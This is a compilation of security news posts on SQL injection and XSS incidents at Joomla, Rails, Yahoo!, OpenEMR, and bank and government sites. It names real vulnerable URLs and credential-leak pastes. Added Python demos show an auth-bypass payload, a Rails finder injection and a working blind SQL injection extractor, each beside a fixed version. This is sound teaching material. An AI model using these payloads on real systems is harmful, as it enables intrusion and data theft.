Joomla 3.2.2 is vulnerable to SQL Injection and XSS


If your website is running Joomla 3.2.2, you should upgrade your CMS to the latest version.

Joomla 3.2.3 has been released, addressing more than 40 bugs and four security vulnerabilities.

One of the patched flaws is a SQL injection caused by inadequate escaping, rated High severity. It affects versions 3.1.0 through 3.2.2.

Two more are cross-site scripting vulnerabilities, rated Medium severity.

The fourth allows unauthorized logins through Gmail authentication, caused by inadequate checking. It affects 2.5.8 and earlier 2.5.x releases, and 3.2.2 and earlier 3.x releases.

Whether or not the 40 bug fixes matter to you, the security fixes always should. Update your CMS now, before attackers inform you of the flaws by hacking your site.

'Advanced Power' botnet attempts to hack website using victim's machine

Security researcher Brian Krebs has reported a new botnet that uses infected machines to test websites for vulnerabilities.

The malware, which disguises itself as a legitimate Firefox add-on called "Microsoft .NET Framework Assistant", uses the infected machines to probe every website the victim visits for SQL injection vulnerabilities.

Once the malware has built a list of vulnerable websites, the criminals behind the botnet can exploit those flaws to inject malicious code into the sites, which in turn helps them grow the number of infected websites and systems.

Advanced Power test SQL Injection vulnerability

The malware is also capable of stealing sensitive information, but that feature does not appear to be activated on infected systems.

Alex Holden, chief information security officer at Hold Security LLC, analyzed the malware and believes its authors are from the Czech Republic, based on text strings found in the code.

According to Krebs, more than 12,500 systems have been infected with this malware, and they have been used to identify at least 1,800 web pages vulnerable to SQL injection.

Update:
In an email, a Mozilla spokesperson told EHN that "they have disabled the fraudulent 'Microsoft .NET Framework Assistant' add-on used by 'Advanced Power' as part of its attack. You should always be careful with anything you download. It's a good idea to use many layers of protection, including antivirus software to stop malware."

Vevo website hacked by TeslaTeam via SQL Injection vulnerability

Tesla Team, a hacker group from Serbia, has claimed to have breached the Vevo website (vevo.com).

Vevo is a joint venture music video website owned and operated by Universal Music Group, Google, Sony Music Entertainment, and Abu Dhabi Media.

The team says it discovered a SQL injection vulnerability in one of Vevo's sub-domains that allowed it to compromise the site's database.

In a Pastebin leak (pastebin.com/TAjce91x), the group published the vulnerable link along with a proof of concept that exploits the flaw. The database dump is claimed to contain the email addresses and passwords of admins and other users.

It appears that a HackForums user with the handle "JoinSeventh" had already published details of the vulnerability in 2012.

OpenEMR affected by Multiple Vulnerabilities

OpenEMR, the most popular open source electronic medical records application, has been reported by Trustwave SpiderLabs to contain multiple vulnerabilities.

The report says that guest-level access, combined with several application flaws, allowed the researcher to compromise the server running OpenEMR and use it as a foothold for attacking the internal network.

The researcher found a SQL injection vulnerability in the "Reports > Visits > SuperBill > Dates" page.

"By browsing to this page and dumping junk into either the start or end date parameter", he saw the raw SQL error message: "ERROR: query failed: select * from forms where form_name = 'New Patient Encounter' and date between 'a'' and '2013-07-12' order by date DESC"

The report also claims that most of the database contents could be dumped, including sensitive patient data and numerous usernames and password hashes. "I let my GPU box chew on the password hashes for a bit, and kept poking at the application," the blog says.

OpenEMR is also reported to have an HTML injection/XSS flaw on the 'Office Notes' page. Through it, the researcher was able to trick users visiting the page into authenticating to his system, which hosted a fake SMB server issuing static challenges:

Image Credits: SpiderLabs

"This allowed me to capture a handful of domain usernames and password hashes. In addition, I had some luck cracking the OpenEMR password hashes from earlier, and some of the passwords were re-used locally on the Linux system hosting OpenEMR, allowing me access via SSH."(SpiderLabs reports)

OpenEMR has been informed and has patched the vulnerabilities in the latest 4.1.1 patch.

Author: Shalini Bhushan


Reckz0r identified POST SQL Injection vulnerability in Twitter

The hacker Reckz0r, who recently breached the CNN website, has identified a POST-based SQL injection vulnerability in a Twitter support page.

The 'Referrer' parameter of the api_general form on support.twitter.com is vulnerable to SQLi.

Although the vulnerability would allow confidential data to be extracted from Twitter, the hacker says he did not engage in any malicious activity because he does not want his account suspended.

The screenshot provided by the hacker:



"The vulnerability lies in http://support.twitter.com/forms/submitted?regarding=api_general - You see, there might be dozens of vulnerabilities lying in support.twitter.com. We can inject hidden boxes in this kind of atmosphere," the hacker said.

Brazil Navy and Pakistan Army websites hacked by SQL Injection


These breaches are the latest examples of governments being careless about cyber security. The hacker @WilyXem has found two more military websites vulnerable to SQL injection.

Websites of the Brazilian Navy and the Pakistan Army are affected. The hacker tweeted several links containing the proofs of concept (http://sprunge.us/ZUHM, sprunge.us/ZdKY, sprunge.us/CJGO).

The vulnerable sites are the Navy's Board of History and Documentation (biblioteca.dphdm.mar.mil.br), its Department of Distance Education (ead.densm.mar.mil.br) and the Pakistan Army (www.pakistanarmy.gov.pk).

The POCs expose details of the target databases, including database name, database version and table names.

Yesterday the same hacker broke into the Royal Thai Navy website and leaked login information from its database.


Yahoo! Blind SQL Injection could lead to data leakage


It seems that 2013 is the "Data Leakage Year": large amounts of customer information and confidential data from government institutions, well-known vendors and other companies have been published on the internet.

Ebrahim Hegazy (@Zigoo0), an Egyptian information security advisor who found a high-severity vulnerability in the Avira license daemon a few days ago, is in the news again, this time for finding and reporting a blind SQL injection vulnerability in one of Yahoo!'s e-marketing applications. SQL injection vulnerabilities are ranked as critical because, in an attacker's hands, they lead to a database breach and the leakage of confidential information.

A time-based blind SQL injection vulnerability was detected in the official Yahoo! TW YSM Marketing application service. It allows remote attackers to inject their own SQL commands, breach the database of the vulnerable application and gain access to user data.

The vulnerability is located in the index.php file of the soeasy module, which fails to sanitise the scId request parameter. By manipulating scId, an attacker can inject SQL commands and compromise the web application's DBMS.

The vulnerability can be exploited by remote attackers without a privileged application account and without user interaction. Successful exploitation results in compromise of the application and its database.

Ebrahim is a white-hat hacker, so he reported the vulnerability to the Yahoo! security team together with recommendations on how to patch it.

According to Ebrahim, the time line of the vulnerability was:
================
2013-02-24:    Researcher Notification & Coordination
2013-02-25:    Vendor Notification
2013-03-01:    Vendor Response/Feedback
2013-04-01:    Vendor Fix/Patch by check
================

More details about the vulnerability could be found here:
http://www.resecure.me/public/Yahoo-TW-YSM-BSQLI.txt

As most readers know, Yahoo! has neither a bug bounty program nor a hall of fame; instead it rewards researchers who find vulnerabilities in its applications with Yahoo!-branded T-shirts and other tokens. The researcher told us that he received a package from Yahoo! containing two T-shirts and a large mug as his reward.

US Telecom companies and Banks breached by Tunisian Cyber Army

As part of their ongoing operation against the United States, known as "#opBlackSummer", the Tunisian Cyber Army (TCA) and the Al-Qaeda Electronic Army (AQEA) have breached websites belonging to US telecommunications companies.

The group has identified three SQL injection vulnerabilities in AT&T sub-domains and one in the Verizon website. The hackers provided the vulnerable links to EHN.

The hackers also attacked the official website of the U.S. Small Business Administration (sba.gov), Merrimack County Savings Bank (mcsbnh.com) and State Bank of Park Rapids (statebankofparkrapids.com).

The team says it exploited the vulnerabilities and obtained information such as user IDs, security question answers, passwords, postal addresses and email addresses.

XSS in FBI website

Speaking to EHN, the TCA said they exploited an XSS vulnerability in the FBI website by getting an administrator to open a crafted FBI site link. The hackers claim that this gave them temporary access to the administrator's computer, from which they downloaded some files about crimes and reports.

EHN cannot confirm the hackers' claims about the data they compromised, but the vulnerability links they provided are valid.

Pakistan government site again hacked via SQL Injection vulnerability


Indian hacker Godzilla has once again hacked a very important Pakistani site, www.pakistan.gov.pk.

He took down many Pakistani sites just a few days ago: http://www.ehackingnews.com/2013/03/indian-hacker-godzilla-leaked-pakistan.html

He gave this reason for the attacks: "Pakistan is a country which is currently supporting terrorist activities through ISI, and if they regret, Pakistan army and Ministry of Defense mail server backups are enough to prove how closely they are related to terrorism. Pakistan, stop these activities before it's too late."

The attack appears to have been carried out via SQL injection.





He finally noted that "No matter how hard you try we will get inside in no time." 

Speaking to EHN, the hacker said: "Admins and governments take website security lightly, thinking that they are hosted outside; it gets treated through your inside network. That's enough to get inside your network."

Arabian Gulf Oil Company(Agoco) website hacked by QuisterTow


A hacker with the online handle QuisterTow has claimed to have identified a critical SQL injection vulnerability in the website of Agoco (agoco.com.ly), the Arabian Gulf Oil Company based in Benghazi, Libya, which is engaged in crude oil and natural gas exploration, production and refining.

The hacker exploited the vulnerability and dumped the database from the server, then leaked the login credentials it contained along with details of the database.

The leak (pastebin.com/8HLiDqVt) contains the usernames and passwords of the admin and a few other users. The admin password is very weak and was stored, and leaked, in plain text.

The hacker also provided the vulnerable link together with a proof-of-concept exploit for the SQL injection that lists the username and password information.

Bollywood Actress Divya Dutta website vulnerable to critical vulnerabilities


Ravi Kariya, a security analyst at Cyber Octet Pvt. Ltd (facebook.com/cyberoctet), has discovered critical vulnerabilities in the official website (divyadutta.co.in) of the Indian actress Divya Dutta.

There are two SQL injection vulnerabilities in the website. One is in the Press Clips page (divyadutta.co.in/pressclipdetail.asp?id=7); a malicious hacker can exploit it to extract the database.

The other is more critical: it allows an attacker to bypass authentication on the login page and sign in to the admin area (divyadutta.co.in/admin/) as admin. This is done by submitting a crafted password that alters the SQL query so that it evaluates to true regardless of the credentials supplied.
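Both flaws in this site come from the same root cause, user input concatenated into the query text, and the same cause produced the raw error message in the OpenEMR report above. The following is an added Python example, not code from the site, from Cyber Octet or from SpiderLabs; it uses an in-memory SQLite database with constructed rows, and its table and column names are assumptions. It shows a login query that a crafted password turns into an always-true condition, a date-range query in which junk in one parameter surfaces the database's error text (the tell-tale the OpenEMR researcher saw), and the parameterised versions that treat exactly the same inputs as plain data.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's tables (not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'hunter2')")
    db.execute("CREATE TABLE visits (form_name TEXT, date TEXT)")
    db.execute("INSERT INTO visits VALUES ('New Patient Encounter', '2013-07-01')")
    db.commit()
    return db


# Crafted password for the auth-bypass case: it closes the string literal and
# appends an always-true term, so the WHERE clause succeeds for any username.
BYPASS_PASSWORD = "' OR '1'='1"


def login_vulnerable(db, username, password):
    """Query assembled by string formatting: the password is parsed as SQL."""
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None


def login_hardened(db, username, password):
    """Same query with bound parameters: the password is a value, never SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def visits_between_vulnerable(db, start, end):
    """Date-range report built by concatenation, like the OpenEMR query quoted above."""
    sql = ("SELECT * FROM visits WHERE form_name = 'New Patient Encounter' "
           "AND date BETWEEN '%s' AND '%s' ORDER BY date DESC" % (start, end))
    return db.execute(sql).fetchall()


def visits_between_hardened(db, start, end):
    """Same report with the dates bound as parameters."""
    sql = ("SELECT * FROM visits WHERE form_name = 'New Patient Encounter' "
           "AND date BETWEEN ? AND ? ORDER BY date DESC")
    return db.execute(sql, (start, end)).fetchall()


def sql_error_for(query_fn, db, start, end):
    """Return the database's error text if junk in a parameter breaks the query, else None.
    A raw error echoed back to the browser is the classic first sign of injection."""
    try:
        query_fn(db, start, end)
    except sqlite3.Error as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "nobody", BYPASS_PASSWORD))                   # True: bypassed
    print(login_hardened(db, "nobody", BYPASS_PASSWORD))                     # False
    print(sql_error_for(visits_between_vulnerable, db, "a'", "2013-07-12"))  # error text
    print(sql_error_for(visits_between_hardened, db, "a'", "2013-07-12"))    # None
```

The stray quote in `a'` leaves an unterminated string literal in the concatenated query, which is why the database complains; with parameters the same value is simply a date that matches nothing.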

There is also a cross-site scripting vulnerability in the contact page (divyadutta.co.in/contact.asp). Entering the following payload in the form fields and clicking submit executes the injected script:

"><script>alert('My Love For Divya Dutta')</script>




Ravi tried to contact Divya Dutta by email and Twitter, but she did not respond to his query. It seems she does not realise the severity of these flaws: a black-hat hacker could deface the site with them.

I think she will respond after some black hats attack the site. What do you think, guys?

*Update*
After E Hacking News published this story, the admin took the Divya Dutta site down. It now displays the following error message:

"Directory Listing Denied.This Virtual Directory does not allow contents to be listed."


Sri Lankan NIC site(nic.lk) hacked via SQL injection vulnerability

Recently we reported that hackers hijacked Turkmenistan's top-level domains for Google, Gmail, YouTube and others by exploiting a vulnerability in NIC.tm. Now they have discovered a vulnerability in another NIC website.

The hackers found a critical SQL injection vulnerability in the Sri Lankan NIC website (nic.lk) which, they say, would allow them to hijack Sri Lankan top-level domains.



NIC websites are among the most important parts of a country's presence on the internet. A network information center (NIC) is the part of the Domain Name System (DNS) that keeps the database of domain names and generates the zone files which map domain names to IP addresses.

Each NIC is an organisation that manages the registration of domain names within the top-level domains for which it is responsible, sets the policies for domain name allocation, and technically operates its top-level domain.

"Any unauthorized access can make a disaster to the compromised country," the hackers said, "for example changing all government websites' DNS to hacker DNS and grabbing all high-level man of country credentials."

The hackers extracted data from the database and dumped it. They claim to have reported the flaw to the NIC but received no response from its security team.

Critical SQL Injection vulnerability in Punjab and Sind Bank website

 
Information security expert Narendra Bhati has discovered a critical SQL injection vulnerability in the Punjab and Sind Bank website (psbindia.com).

Punjab & Sind Bank (P&SB) is a major Public Sector bank in Northern India. Of its more than 1100 branches and offices spread throughout India, almost 450 are in Punjab state, though the bank's corporate headquarters is in New Delhi.

The researcher sent the vulnerable link to EHN by email. Since the vulnerability is highly critical, we are not publishing the link here.


The researcher also provided proof-of-concept code that allows an attacker to extract usernames, hashed passwords and address details stored in the bank's database.

The same link is also vulnerable to cross-site scripting (XSS), allowing an attacker to inject an iframe that renders within the site.

Bangladesh Railway, NIMC & Jiban Bima Corporation sites vulnerable to SQL Injection

The Tunisian hacker Human Mind Cracker has claimed to have discovered SQL injection vulnerabilities in several top Bangladesh government websites.

In an email to E Hacking News, the hacker said he found SQLi in three government sites.

The affected sites are the official site of Bangladesh Railway (railway.gov.bd), the National Institute of Mass Communication of Bangladesh (NIMC.gov.bd) and Jiban Bima Corporation (JBC.gov.bd).


The hacker breached the database server belonging to the National Institute of Mass Communication and leaked the stolen data on Hey Paste It (heypasteit.com/clip/0NUH).

The dump contains database table names, user names and hashed passwords, with more than 650 entries of user data.

The hacker claims that the Bangladesh government websites are not secure at all. As far as I know, it is not only Bangladesh: other countries' government sites are vulnerable too. More than 90% of government websites are vulnerable.

Algerian Bank CPA hacked by Tunisian Hacker


The Algerian bank Crédit populaire d'Algérie (CPA) has been found vulnerable to SQL injection. The critical flaw was discovered by the grey-hat Tunisian hacker "Human Mind Cracker", who usually targets bank and government sites.

In an email to EHN, the hacker provided the vulnerable link on the site (cpa-bank.dz).

"I reported the vulnerability to them before I hacked into the database; 2 days without reply or anything... After that I found that the email they put on the website for contact is an INVALID mail. So I got into the database," the hacker said.

In a paste (heypasteit.com/clip/0NLX), the hacker dumped the compromised data to demonstrate the severity of the vulnerability. It contains usernames, passwords, email addresses, phone and fax numbers, and locations.

Bangladesh Post Office site hacked by Human Mind Cracker

A SQL injection vulnerability has been discovered in the official website of the Bangladesh Post Office (bangladeshpost.gov.bd) by the grey-hat hacker "Human Mind Cracker".

In an email to EHN, the hacker provided the vulnerable link and claimed that the site has many other vulnerabilities as well.

The hacker breached the site by exploiting the SQL injection vulnerability and compromised its database.

Screenshot of Admin Panel

"I got into their database, and the funniest thing is that the passwords are not encrypted with any hash, and this is so bad for a website related to a government," the hacker said in the email.

The database dump (heypasteit.com/clip/0N9U) contains database details, usernames and plain-text passwords, including the admin username and password.

Sony France site vulnerable to SQL Injection

The Sony France website (sony.fr) has been found vulnerable to a SQL injection flaw that allows attackers to compromise its data. The vulnerability was identified by a hacker from the xl3gi0n hackers group.

Sony Corporation commonly referred to as Sony, is a Japanese multinational conglomerate corporation headquartered in Kōnan Minato, Tokyo, Japan. Its diversified business is primarily focused on the electronics, game, entertainment and financial services sectors.


The vulnerability is in the Sony Computer Science Laboratory site (csl.sony.fr). The vulnerable link provided by the hacker:
www.csl.sony.fr/~pachet/markov_applet_style/get_lyrics.php?auth=10,000 Maniacs&id=1
The hacker claims that he reported the vulnerability to Sony and was rewarded for his finding.

At the time of writing, I am unable to reach csl.sony.fr. It appears that the admin has taken the website offline.

CVE-2012-5664: All Ruby on Rails versions vulnerable to SQL Injection


A SQL injection vulnerability has been discovered in Ruby on Rails that affects all current versions of the web framework.

According to the advisory, due to the way dynamic finders in Active Record extract options from method parameters, a method parameter can mistakenly be used as a scope.

A carefully crafted parameter can therefore be used to inject arbitrary SQL.

Dynamic finders use the method name to determine which field to search, so a call such as Post.find_by_id(params[:id]) is vulnerable when the parameter can arrive as something other than a plain scalar, for example a hash produced by the request parameter parser.
 
The vulnerability is fixed in 3.2.10, 3.1.9 and 3.0.18. All users running an affected release should upgrade or apply one of the workarounds immediately.

The vulnerability was disclosed on the Phenoelit blog in late December, where the author used the technique to extract user credentials and bypass the Authlogic authentication framework.
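The advisory's point, a method parameter being used as a scope, is easier to see in a toy model. The following is an added Python sketch of the mechanism, not Rails or Active Record code and not the Phenoelit exploit: a finder that accepts a variable number of arguments and peels off a trailing hash as an options hash, fed by a controller that takes params from a JSON body. The `users` table, its rows, the `select` option name and the request bodies are all constructed for the example. The last call shows the shape of the cast-to-expected-type workaround, which turns the hash back into a harmless value.

```python
import json
import sqlite3


def make_db():
    """Constructed in-memory users table; rows are made up for the example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, login TEXT, persistence_token TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'tok-admin')")
    db.execute("INSERT INTO users VALUES (2, 'bob', 'tok-bob')")
    db.commit()
    return db


def find_by_id(db, *args):
    """Toy dynamic finder modelling the behaviour the advisory describes: a trailing
    dict argument is treated as an options hash, and its 'select' entry is spliced
    into the query verbatim. If the dict was the *only* argument there is no value
    left to match, so the finder searches for id IS NULL with the caller's select list."""
    args = list(args)
    options = args.pop() if args and isinstance(args[-1], dict) else {}
    select = options.get("select", "*")
    if args:
        sql = "SELECT %s FROM users WHERE id = ?" % select
        return db.execute(sql, (args[0],)).fetchone()
    sql = "SELECT %s FROM users WHERE id IS NULL" % select
    return db.execute(sql).fetchone()


def lookup(db, request_body, cast_to_scalar=False):
    """Controller-style handler: parse a JSON body and hand params['id'] to the finder.
    With cast_to_scalar the value is stringified first, so a hash can no longer be
    mistaken for an options argument (the shape of the advisory's workaround)."""
    params = json.loads(request_body)
    value = params["id"]
    if cast_to_scalar:
        value = str(value)
    return find_by_id(db, value)


# Constructed request bodies: a normal lookup, and one where the parameter parser has
# turned the id into a hash carrying a select list that ends in a SQL line comment,
# which discards the finder's own WHERE clause.
NORMAL = '{"id": 2}'
ATTACK = '{"id": {"select": "* FROM users WHERE login = \'admin\' --"}}'

if __name__ == "__main__":
    db = make_db()
    print(lookup(db, NORMAL))                        # (2, 'bob', 'tok-bob')
    print(lookup(db, ATTACK))                        # (1, 'admin', 'tok-admin')
    print(lookup(db, ATTACK, cast_to_scalar=True))   # None
```

The attack body never needs a valid id: the finder's query becomes `SELECT * FROM users WHERE login = 'admin' -- FROM users WHERE id IS NULL`, returning the admin row and its token, which is the credential-extraction pattern the Phenoelit post describes against Authlogic.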

Tunisian hacker 'Human Mind Cracker' discovered SQLi vulnerability in Tunisian Bank sites

XSS in Bank sites

The grey-hat hacker "Human Mind Cracker" has discovered SQL injection vulnerabilities in several Tunisian bank websites. The Central Bank of Tunisia (bct.gov.tn) and the Bank of Tunisia and the UAE (bte.com.tn) are vulnerable to SQLi.

In an email to EHN, the hacker provided the vulnerable link and a proof of concept (POC). As he asked us not to publish the vulnerable link, we are not providing it here.

According to the hacker, he reported the vulnerability to the banks but they did not fix it, so he broke into the database.

He has published some of the information taken from the server, including the database name and a few usernames.

He has also discovered cross-site scripting (XSS) vulnerabilities in the Central Bank of Tunisia, atb.com.tn and Banque de Tunisie (bt.com.tn).

SQL injection is one of the most critical classes of vulnerability, since an attacker can extract the entire database by exploiting it. Banks should seriously strengthen their security measures, as cyber criminals mainly target financial institutions.

Pakistan Hacker Explains How Pakistan google and other sites got hacked

Boolean-based blind SQL injection vulnerability

Recently, news of the Pakistani Google hack spread like wildfire across the internet. At the time, top-level Pakistan domains including Yahoo, MSN, HSBC, eBay, PayPal and more displayed the defacement page.

Today khanisgr8, a hacker from the Pakistani collective "TeamBlackHats", sent an email about the breach explaining how those websites were hacked by the Turkish hacker group "Eboz".

The day before yesterday we noted that the hacked sites' DNS records pointed to a free hosting site, and we reported that the sites might have been hacked through a PKNIC vulnerability.

PKNIC is responsible for the administration of the .PK domain name space, including the operation of the DNS root servers for .PK domains and the registration and maintenance of all .PK domain names. PKNIC is operated as a self-supporting organisation.

The hackers claim to have discovered a Boolean-based blind SQL injection, persistent cross-site scripting and sensitive directory disclosure vulnerabilities in the official PKNIC website.

They provided us with the vulnerable link and a POC to exploit it, together with data compromised through the vulnerability, including database details, usernames and hashed passwords.
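A Boolean-based blind injection, as claimed here against PKNIC, returns no data directly: the attacker only learns whether the page behaved one way or another, and reconstructs values from that single bit per request. The following is an added Python example of how that extraction works, not PKNIC's code and not the hackers' POC; it uses an in-memory SQLite database with constructed rows, and the endpoint, table and column names are assumptions. The vulnerable endpoint pastes an unquoted numeric parameter into its query (the same pattern as the scId parameter in the Yahoo! report above), and the extractor binary-searches each character's code point through it. Where even the page content does not differ, the same search runs on response time instead, wrapping the condition in a conditional delay such as MySQL's SLEEP(); that is the time-based variant reported against Yahoo!.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a registrar's database (not PKNIC's data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', '5f4dcc3b')")
    db.execute("CREATE TABLE pages (id INTEGER, title TEXT)")
    db.execute("INSERT INTO pages VALUES (1, 'Register a domain')")
    db.commit()
    return db


def page_found(db, page_id):
    """Vulnerable endpoint: the id parameter is pasted unquoted into the query.
    It leaks nothing but 'a row came back or it did not', which is all an oracle needs."""
    sql = "SELECT title FROM pages WHERE id = %s" % page_id
    return db.execute(sql).fetchone() is not None


def page_found_hardened(db, page_id):
    """Rejects anything that is not an integer and binds the value as a parameter."""
    try:
        page_id = int(page_id)
    except (TypeError, ValueError):
        return False
    row = db.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row is not None


def blind_extract(oracle, column, table, where, max_len=64):
    """Recover a string value one character at a time through a true/false oracle.
    For each position, binary-search the character's code point with payloads of the form
      1 AND (SELECT unicode(substr(col, pos, 1)) FROM tbl WHERE ...) > mid
    Past the end of the string substr() yields '' and unicode('') is NULL, so every
    comparison is false and the search bottoms out at 0: that is the stop condition."""
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = ("1 AND (SELECT unicode(substr(%s, %d, 1)) FROM %s WHERE %s) > %d"
                       % (column, pos, table, where, mid))
            if oracle(payload):
                lo = mid + 1   # the code point is above mid
            else:
                hi = mid       # the code point is mid or below (or NULL: end of string)
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered


def dump_admin_hash(db, endpoint):
    """Drive the extractor through a given endpoint; yields '' once the endpoint is hardened."""
    return blind_extract(lambda p: endpoint(db, p),
                         "password_hash", "users", "username = 'admin'")


if __name__ == "__main__":
    db = make_db()
    print(dump_admin_hash(db, page_found))                  # 5f4dcc3b
    print(repr(dump_admin_hash(db, page_found_hardened)))   # ''
```

Each character costs seven requests, so a 32-character hash takes a few hundred; the hardened endpoint refuses the payload before it reaches the database, and the extractor stops immediately because no position ever answers true.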

XSS vulnerability in PKNIC

He also provided a screenshot of the cross-site scripting vulnerability. When I tried to verify it, I searched Google for the URL and visited a PKNIC link. On the page I saw the text "<script>alert("HACKED BY COde InjectOr")</script>". Maybe the Code Injector team had attempted to exploit the vulnerability.

"Apparently Google Pakistan has been defaced by a Turkish hacker group, 'Eboz'. It's still quite hard to believe that a Google server has been hacked. They really need to put a lot of focus on their defenses, because if one website got hacked that means every other website can be hacked," they said.

We have emailed PKNIC about the vulnerability and are waiting for a response. As we do not know whether it has been fixed, we are not providing the vulnerable link here.